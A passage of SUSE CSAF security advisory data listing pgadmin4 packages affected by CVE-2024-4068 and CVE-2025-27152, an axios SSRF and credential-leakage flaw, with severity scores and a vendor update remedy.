"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-04-16T08:37:10Z",
"details": "important"
}
],
"title": "CVE-2024-4068"
},
{
"cve": "CVE-2025-27152",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-27152"
}
],
"notes": [
{
"category": "general",
"text": "axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if \u2060baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-27152",
"url": "https://www.suse.com/security/cve/CVE-2025-27152"
},
{
"category": "external",
"summary": "SUSE Bug 1239305 for CVE-2025-27152",
"url": "https://bugzilla.suse.com/1239305"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Enterprise Storage 7.1:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Enterprise Storage 7.1:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Enterprise Storage 7.1:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP3-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server 15 SP5-LTSS:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Proxy 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Proxy 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.ppc64le",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.s390x",
"SUSE Manager Server 4.3:pgadmin4-4.30-150300.3.18.1.x86_64",
"SUSE Manager Server 4.3:pgadmin4-doc-4.30-150300.3.18.1.noarch",
"SUSE Manager Server 4.3:pgadmin4-web-4.30-150300.3.18.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-04-16T08:37:10Z",
"details": "important"
}
],
"title": "CVE-2025-27152"
}
]
}
suse-su-2025:1227-1
Vulnerability from csaf_suse
Published
2025-04-14 07:06
Modified
2025-04-14 07:06
Summary
Security update for pgadmin4
Notes
Title of the patch
Security update for pgadmin4
Description of the patch
This update for pgadmin4 fixes the following issues:
- CVE-2025-27152: axios: Fixed SSRF and creadential leakage due to requests sent to absolute URL even when baseURL is set (bsc#1239308)
Patchnames
SUSE-2025-1227,SUSE-SLE-Module-Python3-15-SP6-2025-1227,openSUSE-SLE-15.6-2025-1227
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for pgadmin4",
"title": "Title of the patch"
},
{
"category": "description",
